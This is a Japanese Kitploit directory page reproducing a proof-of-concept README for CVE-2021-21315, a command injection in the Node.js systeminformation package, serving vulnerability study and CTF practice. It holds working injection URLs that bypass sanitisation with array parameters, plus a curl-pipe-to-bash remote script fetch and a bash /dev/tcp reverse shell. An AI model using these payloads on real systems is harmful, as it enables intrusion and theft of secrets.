Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-21315-PoC — CVE 2021-21315 PoC | Kitploit
ツール/GitHubGitHub/forbiddenprogrammer/cve-2021-21315-poc
脆弱性分析エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubforbiddenprogrammer/cve-2021-21315-poc

CVE-2021-21315-PoC

CVE 2021-21315 PoC

リポジトリを見る
1602525年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-21315-systeminformation

これは CVE-2021-21315 の Proof of Concept です。この脆弱性は Node.JS 用の System Information ライブラリ(npm パッケージ "systeminformation")に影響します。npmjs.com/systeminformation

"si.inetLatency()、si.inetChecksite()、si.services()、si.processLoad() に渡される service パラメータを必ずチェックまたはサニタイズしてください... 文字列のみを許可し、配列はすべて拒否してください。文字列のサニタイズは期待どおりに機能します。"

(私の意見では)この脆弱性は十分に説明されていないため、影響を受けるバージョンの systeminformation をベースにした小さなアプリを作成することにしました。 PoC には以下が含まれます:

  1. express と影響を受ける systeminformation を使用した Node.js 製のテストアプリ
  2. 影響を受けるマシンに .txt ファイルを作成するための簡単なテストペイロード

再現手順:

  1. Linux サーバー環境でアプリケーションを実行します
  2. site.com/api/getServices?name=nginx に GET リクエストを送信します(nginx は単なる例です) 画像
  3. 次に、次のようなリクエストを送信してみてください: yoursite.com/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt) 画像

これは文字列のサニタイズにより失敗します: 画像

CVE の詳細に記載されているとおり「サニタイズは期待どおりに機能し、配列はすべて拒否されます [...]」

  1. 次に、次のリクエストを送信してみてください: yoursite.com/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt) 画像 今回は、"name" の値を確認すると、サニタイズされていません - 成功です! コマンドが実行されたかどうか確認してみましょう

画像

成功です! コマンドが実行されました。 もちろん "pwn.txt" 自体に興味を持つ人はいませんが、潜在的な攻撃者は以下のことが可能です:

  1. index.js(アプリケーションの中核であり、API キー、データベース接続文字列などを含む可能性があります)などの内部ファイルや、その他のファイルをアップロードする
ツールをダウンロード
  • スクリプトをダウンロードして実行する - curl -s http://server/path/script.sh | bash /dev/stdin arg1 arg2
  • リバースシェル - bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
  • プロセスを強制終了する(テスト用の node アプリケーションも強制終了できます)
  • さらに悪質なことも....
  • 「コマンドインジェクション」は無害に聞こえますが、特定の条件が満たされると大きな影響を与える可能性があります

    この問題は "systeminformation" のバージョン 5.3.1 で修正されました https://www.huntr.dev/users/EffectRenan にクレジットを捧げます(彼が脆弱性を発見しましたが、私の意見では、彼の "PoC" は現実世界での影響を示していませんでした)

    また、この PoC を CTF で遠慮なく使用してください。ただし、発見者である EffectRean と PoC 作成者である私にクレジットを記載していただけると嬉しいです。それでは!

    免責事項

    このプロジェクトは教育目的のみに使用できます。事前の許可なく対象システムに対してこのソフトウェアを使用することは違法であり、このソフトウェアの誤用によるいかなる損害についても著者は責任を負いません。